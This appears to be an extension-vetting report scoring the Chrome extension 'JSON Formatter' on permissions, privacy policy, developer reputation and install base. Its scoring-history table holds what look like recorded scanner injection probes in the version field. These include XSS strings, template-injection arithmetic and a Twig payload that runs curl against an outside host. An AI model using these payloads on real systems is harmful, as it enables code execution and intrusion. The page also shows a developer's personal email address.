JSON Formatter
bcjindcccaagfpapjjmafapmmgkkhgoa
Risk Score
4.04
Risk Level:
Medium
Recommendation:
🟡 MEDIUM RISK — review
Top Risks
- Content scripts injected on ALL URLs (<all_urls> + *://*/*) gives full page read/write on every site visited.
- Privacy policy is Google's generic account policy — does not scope to this extension at all (scope_extension=false, admits data_collection+third_party_sharing).
- Developer is a free-webmail (Gmail) address with no registered developer name or business domain.
- No content_security_policy (MV3 default strict, but absence means no extra hardening signal).
- Verified publisher badge partially mitigates, but generic Google policy admits collection/sharing — trust ceiling limited.
Evidence
- broad_host_access manifest host_permissions and content_scripts_matches both list <all_urls>/*://*/* — content scripts run on every page.
- generic_privacy_policy store Privacy URL is myaccount.google.com/privacypolicy; scope_extension=false, data_collection=true, third_party_sharing=true.
- free_webmail_developer store Developer email reddy.vivaanh@gmail.com; developer_name empty; no business domain.
- verified_publisher store verified_publisher=true and is_featured_by_google=true — partial trust signal.
- no_code_findings crx code_findings_raw empty; obfuscation_score=0.0; js_external_hosts empty — no malicious indicators detected.
- no_cve_findings crx cve_findings_raw empty; no vulnerable bundled libraries detected.
- large_install_base store 2,000,000 installs — high blast radius if extension were compromised or transferred.
- no_csp manifest content_security_policy is null; MV3 default applies but no explicit hardening declared.
Permissions Breakdown
- storage low Stores user preferences locally; minimal risk.
- *://*/* high Broad host access; content scripts run on all URLs.
- <all_urls> high Redundant with *://*/* — grants full cross-origin read access via content scripts.
Pillar Scores
Permissions5.50
Reputation4.50
Network2.00
Webstore1.50
Maintenance0.00
Privacy10.00
Code Quality0.00
CVE Exposure0.00
Scoring History
| fsssiedxn193d6507zan193d6507zsssiedx | 3.52 | Low | review | 2026-09-06 |
| sssiedn1e7b1831dp727562726963xsx | 3.73 | Low | review | 2026-09-06 |
| %22fsssiedxa$'sssiedx | 3.97 | Low | review | 2026-08-20 |
| 'fsssiedxa sssiedx | 2.72 | Low | review | 2026-08-20 |
| 3.77 | Low | review | 2026-08-20 | |
| fsssiedxa$'sssiedx | 2.72 | Low | review | 2026-08-20 |
| <fsssiedxa sssiedx | 3.57 | Low | review | 2026-08-07 |
| %22fsssiedxa sssiedx | 3.65 | Low | review | 2026-08-07 |
| 'fsssiedxa'sssiedx | 3.55 | Low | review | 2026-08-07 |
| "fsssiedxa$'sssiedx | 2.77 | Low | review | 2026-08-07 |
| fsssiedxa$"sssiedx | 3.59 | Low | review | 2026-08-07 |
| <fsssiedxa'sssiedx | 4.01 | Medium | review | 2026-08-07 |
| <fsssiedxa xx psssiedx | 3.74 | Low | review | 2026-08-07 |
| <fsssiedxa"sssiedx | 3.79 | Low | review | 2026-08-07 |
| %76%33%2E%36%39%33%36%38%22%28%29%3B%7D%5D%39%36%32%39 | 2.72 | Low | review | 2026-08-05 |
| v3.6/u0022onmouseover=NvSB(92503)/u0022 | 3.58 | Low | review | 2026-08-05 |
| dfb{{98991*97996}}xca | 3.89 | Low | review | 2026-08-05 |
| v3.6&n923333=v953295 | 4.04 | Medium | review | 2026-08-05 |
| "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") | 4.03 | Medium | review | 2026-08-04 |
| v3.6&n913136=v967129 | 3.74 | Low | review | 2026-08-04 |
| <fsssiedxa"sssiedx | 4.27 | Medium | review | 2026-07-30 |
| <fsssiedxa$"sssiedx | 2.59 | Low | review | 2026-07-30 |
| <fsssiedxa'sssiedx | 4.06 | Medium | review | 2026-07-30 |
| <fsssiedxa$'sssiedx | 3.67 | Low | review | 2026-07-30 |
| <fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 4.03 | Medium | review | 2026-07-30 |
| <fsssiedxa | 3.55 | Low | review | 2026-07-30 |
| fsssiedxa<sssiedx | 4.38 | Medium | review | 2026-07-30 |
| fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 4.08 | Medium | review | 2026-07-30 |
| fsssiedxa xx psssiedx | 4.10 | Medium | review | 2026-07-30 |
| fsssiedxa"sssiedx | 3.88 | Low | review | 2026-07-30 |
| fsssiedxa | 4.11 | Medium | review | 2026-07-30 |
| sssieddrubricxsx | 4.00 | Medium | review | 2026-07-30 |
| v3.69202/"();}]9273 | 3.94 | Low | review | 2026-07-29 |
| %76%33%2E%36%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%65%50%48%38%28%39%32%37%31%34%29%22 | 3.76 | Low | review | 2026-07-29 |
| v3.6"onmouseover=ePH8(90182)" | 3.95 | Low | review | 2026-07-29 |
| 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> | 3.67 | Low | review | 2026-07-29 |
| dfb__${98991*97996}__::.x | 4.15 | Medium | review | 2026-07-29 |
| bfgx2731%C0%BEz1%C0%BCz2a%90bcxhjl2731 | 2.68 | Low | review | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitivnlyhrfsif1ee2.bxss.me")}} | 3.61 | Low | review | 2026-07-29 |
| v3.6&n913150=v933971 | 3.59 | Low | review | 2026-07-29 |
| v3.6 | 4.04 | Medium | review | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:18
Listing SHA
f0c33da6f173…
Force block
— not fired
Score recovered
no
Elapsed
19.3s